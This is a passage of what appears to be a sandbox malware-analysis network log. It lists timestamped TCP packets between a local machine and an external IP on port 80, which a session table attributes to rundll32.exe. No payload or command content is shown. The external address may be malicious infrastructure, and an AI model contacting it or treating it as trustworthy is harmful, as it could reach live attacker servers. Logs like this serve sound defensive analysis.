May 25, 2022 11:27:27.346894026 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346910000 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346926928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.346934080 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346937895 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.346965075 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.348109007 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.348145008 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.348167896 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.348184109 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.348210096 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.348242044 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350125074 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350157022 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350179911 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350200891 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350215912 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350236893 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350258112 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350263119 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350275993 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350280046 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350282907 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350305080 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350310087 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350336075 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350358963 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350359917 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350364923 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350377083 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.350403070 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.350406885 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.353005886 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353033066 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353053093 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353074074 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353087902 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353118896 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.353135109 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.353837967 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353864908 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353885889 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353905916 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353924990 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.353950024 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.353957891 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.354001999 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.354005098 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.354027987 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.354042053 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.354085922 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355632067 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355663061 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355688095 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355710983 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355732918 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355742931 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355758905 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355784893 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355789900 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355794907 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355803013 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355818987 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355829000 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355854034 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355878115 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355880022 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355885029 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355902910 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355922937 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355927944 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355928898 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355954885 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355978012 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.355978966 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.355983973 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356004953 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356021881 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356040955 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356044054 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356056929 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356066942 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356089115 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356103897 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356110096 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356117010 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356132984 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356152058 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356167078 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356169939 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356173038 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356178045 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356192112 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356205940 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356209040 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356231928 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356245995 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356251955 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356256008 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356278896 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356298923 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356314898 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356333971 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356336117 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356340885 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356353045 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356374025 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356389046 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356394053 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356395960 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356398106 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356416941 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356437922 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356446028 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356451988 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356460094 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356488943 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356493950 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356502056 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356503010 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356525898 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356540918 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356559992 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356581926 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356604099 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356611967 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356616020 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356626034 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356648922 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356653929 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356657028 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356672049 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356693029 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356693983 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356697083 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356718063 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356739044 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356753111 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.356782913 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356787920 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.356791019 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.357369900 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357399940 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357431889 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357453108 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357475042 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357496023 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357505083 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.357518911 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357542992 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357558966 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.357559919 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.357563972 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.357567072 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.357588053 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.360047102 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.360075951 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.360094070 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.360229015 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.363274097 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363343000 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363362074 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363379955 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363399982 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363425016 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363450050 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363473892 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363481998 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.363492012 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.363497019 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363516092 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:27.363547087 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.363554001 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:27.363888025 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:28.182548046 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:28.200694084 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:28.475930929 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:28.475972891 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:28.476161957 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:28:32.470417976 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49771 | 176.10.119.68 | 80 | C:\Windows\SysWOW64\rundll32.exe |

Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 25, 2022 11:27:26.119944096 CEST | 1245 | OUT | |
May 25, 2022 11:27:26.411830902 CEST | 1246 | IN |